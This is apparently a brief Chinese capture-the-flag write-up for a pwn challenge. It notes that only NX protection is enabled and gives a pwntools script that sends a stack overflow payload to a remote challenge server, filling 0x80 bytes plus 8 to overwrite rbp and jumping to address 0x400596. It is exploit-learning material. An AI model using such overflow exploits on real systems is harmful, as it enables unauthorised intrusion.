1.查看文件保护机制

Pasted image 20231215171744.png
只开启了NX（数据不可执行）

解题脚本：

from pwn import *
r = remote("61.147.171.105", 64191)
payload = "A" * 0x80 + "a" * 0x8 + p64(0x00400596).decode("iso-8859-1")
# 注意这里的payload填充0x80后还需要填充8个字节(64位)的数据来覆盖rbp，之后才是覆盖retn
r.recvuntil("Hello, World\n")

r.sendline(payload)
r.interactive()